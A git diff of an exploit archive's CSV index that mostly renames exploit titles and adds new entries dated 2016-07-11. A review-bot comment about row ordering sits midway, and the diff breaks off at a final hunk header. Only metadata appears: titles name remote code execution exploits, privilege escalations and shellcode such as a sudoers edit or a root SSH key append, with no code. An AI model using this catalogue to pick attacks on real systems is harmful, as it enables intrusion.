diff --git a/files.csv b/files.csv
index fac0ee4c5..5be144729 100755
--- a/files.csv
+++ b/files.csv
@@ -334,7 +334,7 @@ id,file,description,date,author,platform,type,port
 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0
 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service Vulnerability",2004-07-22,"Peter Kruse",hardware,dos,0
 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
-360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS",2004-07-22,bkbll,multiple,dos,80
+360,platforms/multiple/dos/360.pl,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)",2004-07-22,bkbll,multiple,dos,80
 361,platforms/windows/remote/361.txt,"Flash FTP Server Directory Traversal",2004-07-22,CoolICE,windows,remote,0
 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0
@@ -345,7 +345,7 @@ id,file,description,date,author,platform,type,port
 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
-371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS",2004-08-02,N/A,linux,dos,0
+371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)",2004-08-02,N/A,linux,dos,0
 372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21
 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0
@@ -515,9 +515,9 @@ id,file,description,date,author,platform,type,port
 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
 665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 - (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
-668,platforms/windows/remote/668.c,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)",2004-11-30,JohnH,windows,remote,143
+668,platforms/windows/remote/668.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)",2004-11-30,JohnH,windows,remote,143
 669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0
-670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143
+670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)",2004-12-01,JohnH,windows,remote,143
 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed <= 1.05 - Format String / Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0
 673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0
@@ -849,9 +849,9 @@ id,file,description,date,author,platform,type,port
 1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.php SQL Injection",2005-06-08,N/A,php,webapps,0
 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0
 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143
-1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0
-1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
-1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0
+1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0
+1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0
+1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0
 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0
 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
@@ -871,8 +871,8 @@ id,file,description,date,author,platform,type,port
 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0
 1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0
 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
-1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)",2005-06-22,g30rg3_x,php,dos,0
-1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)",2005-06-22,HaCkZaTaN,php,dos,0
+1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0
+1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0
 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0
 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0
@@ -1131,7 +1131,7 @@ id,file,description,date,author,platform,type,port
 1358,platforms/php/webapps/1358.php,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0
 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0
 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0
-1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (c code)",2005-12-07,unitedasia,php,webapps,0
+1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
 1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC",2005-12-07,ZIPLOCK,windows,dos,0
 1363,platforms/php/webapps/1363.php,"Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0
 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0
@@ -1181,7 +1181,7 @@ id,file,description,date,author,platform,type,port
 1412,platforms/linux/local/1412.rb,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0
 1413,platforms/windows/remote/1413.c,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0
 1414,platforms/windows/remote/1414.pl,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060
-1415,platforms/linux/local/1415.c,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)",2006-01-13,Qnix,linux,local,0
+1415,platforms/linux/local/1415.c,"Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)",2006-01-13,Qnix,linux,local,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 (NLST) Denial of Service Vulnerability",2006-01-14,pi3ch,windows,dos,0
 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003
 1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0
@@ -2704,7 +2704,7 @@ id,file,description,date,author,platform,type,port
 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Include Vulnerability",2006-12-27,"Mehmet Ince",php,webapps,0
 3029,platforms/php/webapps/3029.php,"Cacti <= 0.8.6i - cmd.php popen() Remote Injection Exploit",2006-12-27,rgod,php,webapps,0
 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit",2006-12-28,shinnai,windows,dos,0
-3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
+3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0
 3032,platforms/asp/webapps/3032.txt,"wywo - inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0
 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability",2006-12-28,"the master",php,webapps,0
 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit",2006-12-28,shinnai,windows,dos,0
@@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0
-3200,platforms/osx/dos/3200.rb,"Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)",2007-01-25,MoAB,osx,dos,0
+3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0
 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0
 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0
 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0
@@ -4981,7 +4981,7 @@ id,file,description,date,author,platform,type,port
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 - RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
-5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
+5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0
 5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0
 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection Vulnerability",2008-04-03,S@BUN,php,webapps,0
@@ -6116,14 +6116,14 @@ id,file,description,date,author,platform,type,port
 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS <= 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0
 6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability",2008-09-23,d3v1l,php,webapps,0
 6543,platforms/php/webapps/6543.txt,"Ol Bookmarks Manager 0.7.5 - Local File Inclusion Vulnerability",2008-09-23,dun,php,webapps,0
-6544,platforms/php/webapps/6544.txt,"WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability",2008-09-23,GoLd_M,php,webapps,0
+6544,platforms/php/webapps/6544.txt,"WebPortal CMS <= 0.7.4 - (code) Remote Code Execution Vulnerability",2008-09-23,GoLd_M,php,webapps,0
 6545,platforms/php/webapps/6545.txt,"Hotscripts Clone (cid) Remote SQL Injection Vulnerability",2008-09-24,"Hussin X",php,webapps,0
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 - RFI / LFI / SQL Injection Vulnerabilities",2008-09-24,GoLd_M,php,webapps,0
 6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0
 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection Vulnerability",2008-09-24,GoLd_M,php,webapps,0
-6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
+6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 (docs.php doc) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 (defs.php l) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6554,platforms/windows/dos/6554.html,"Google Chrome Browser Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
@@ -7489,7 +7489,7 @@ id,file,description,date,author,platform,type,port
 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability",2009-02-03,x0r,php,webapps,0
 7957,platforms/windows/local/7957.pl,"Free Download Manager <= 3.0 Build 844 - (.torrent) BoF Exploit",2009-02-03,SkD,windows,local,0
 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit",2009-02-03,h4ck3r#47,windows,local,0
-7959,platforms/php/webapps/7959.txt,"Simple Machines Forums (BBCode) Cookie Stealing Vulnerability",2009-02-03,Xianur0,php,webapps,0
+7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing Vulnerability",2009-02-03,Xianur0,php,webapps,0
 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Remote Shell Upload Vulnerability",2009-02-03,"Hussin X",php,webapps,0
 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit",2009-02-03,"Mehmet Ince",php,webapps,0
 7962,platforms/windows/dos/7962.pl,"Hex Workshop 6.0 - (ColorMap files .cmap) Invalid Memory Reference PoC",2009-02-03,DATA_SNIPER,windows,dos,0
@@ -8366,7 +8366,7 @@ id,file,description,date,author,platform,type,port
 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure Vulnerability",2009-06-03,"Nico Leidecker",php,webapps,0
 8869,platforms/php/webapps/8869.txt,"Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability",2009-06-03,DD3str0y3r,php,webapps,0
 8870,platforms/php/webapps/8870.txt,"Joomla Omilen Photo Gallery 0.5b - Local File Inclusion Vulnerability",2009-06-03,ByALBAYX,php,webapps,0
-8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability",2009-06-03,SirGod,php,webapps,0
+8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution Vulnerability",2009-06-03,SirGod,php,webapps,0
 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres Multiple SQL Injection Vulnerabilities",2009-06-03,"Chip d3 bi0s",php,webapps,0
 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit",2009-06-04,"Jon Oberheide",multiple,dos,0
 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0
@@ -8379,7 +8379,7 @@ id,file,description,date,author,platform,type,port
 8881,platforms/windows/local/8881.php,"PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0
 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 (idx) Remote SQL Injection Vulnerability",2009-06-05,snakespc,php,webapps,0
 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-06-05,"ThE g0bL!N",php,webapps,0
-8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability",2009-06-05,YEnH4ckEr,php,webapps,0
+8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row Vulnerability",2009-06-05,YEnH4ckEr,php,webapps,0
 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0
 8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection Vulnerability",2009-06-08,snakespc,php,webapps,0
 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure Vulnerability",2009-06-08,ByALBAYX,asp,webapps,0
@@ -9473,6 +9473,7 @@ id,file,description,date,author,platform,type,port
 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21
 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
+40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent XSS",2016-07-11,"Han Sahin",php,webapps,80
 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21
 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0
 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21
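Review bot: The new row 40083 is spliced between ids 10106 and 10160 instead of being appended with the rest of the 2016-07-11 batch, and the same scattering repeats for 40084 (hunk @@ -10720), 40087–40091 (@@ -11729), 40085 (@@ -15232), 40086 (@@ -17068), 40080–40082 (@@ -29876) and 40092–40093 (@@ -36215), while only 40079 goes to the tail of the file (@@ -36242). The index is already not strictly ordered by id (30170 sits among the 1325x rows), so no consumer that parses the CSV row by row should break, but placing all fourteen new entries contiguously at the end, as 40079 is, would make this batch far easier to audit and to diff against the next import. If the placement follows an upstream ordering that matters, a one-line note in the commit message saying so would save the next reviewer the same question.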
@@ -10720,6 +10721,7 @@ id,file,description,date,author,platform,type,port
 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0
 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0
 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
+40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80
 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0
 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote SQL Injection Vulnerability",2010-03-14,snakespc,php,webapps,0
 11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0
@@ -11729,6 +11731,11 @@ id,file,description,date,author,platform,type,port
 13256,platforms/bsd_x86/shellcode/13256.c,"bsd/x86 - reverse portbind (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 - execve /bin/sh (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 - execve /bin/sh (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
+40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
+40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0
+40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
+40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
+40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80
 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@@ -11801,7 +11808,7 @@ id,file,description,date,author,platform,type,port
 13329,platforms/lin_x86/shellcode/13329.c,"linux/x86 - connect-back port UDP/54321 live packet capture (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13330,platforms/lin_x86/shellcode/13330.c,"linux/x86 - append rsa key to /root/.ssh/authorized_keys2 (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13331,platforms/lin_x86/shellcode/13331.c,"linux/x86 - edit /etc/sudoers for full access (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
-13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
+13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector - Promiscuous mode detector shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
 13333,platforms/lin_x86/shellcode/13333.txt,"linux/x86 setuid(0) & execve(/bin/sh_0_0) shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0
 13334,platforms/lin_x86/shellcode/13334.txt,"linux/x86 setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"linux/x86 - iopl(3); asm(cli); while(1){} (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
@@ -15232,6 +15239,7 @@ id,file,description,date,author,platform,type,port
 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0
 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection Vulnerability",2011-07-14,Netrondoank,php,webapps,0
 17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0
+40085,platforms/windows/local/40085.rb,"MS16-016 mrxdav.sys WebDav Local Privilege Escalation",2016-07-11,metasploit,windows,local,0
 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0
 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0
 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0
@@ -17068,6 +17076,7 @@ id,file,description,date,author,platform,type,port
 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS Vulnerability",2000-01-05,"Ussr Labs",windows,dos,0
 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE Vulnerability",2000-01-04,anonymous,multiple,remote,0
 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal Vulnerability",2000-01-03,"k0ad k1d",cgi,remote,0
+40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,metasploit,ruby,remote,80
 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0
 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0
 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0
@@ -22493,7 +22502,7 @@ id,file,description,date,author,platform,type,port
 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection Vulnerabilities",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0
 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 GR_OSView Information Disclosure Vulnerability",2005-04-07,anonymous,irix,local,0
 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local Arbitrary File Overwrite Vulnerability",2005-04-07,anonymous,irix,local,0
-25363,platforms/windows/dos/25363.py,"Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH",2013-05-11,ariarat,windows,dos,0
+25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH",2013-05-11,ariarat,windows,dos,0
 25364,platforms/windows/dos/25364.txt,"AN HTTPD CMDIS.DLL Remote Buffer Overflow Vulnerability",2005-04-08,"Tan Chew Keong",windows,dos,0
 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection Vulnerability",2005-04-08,"Tan Chew Keong",windows,remote,0
 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0
@@ -29876,6 +29885,9 @@ id,file,description,date,author,platform,type,port
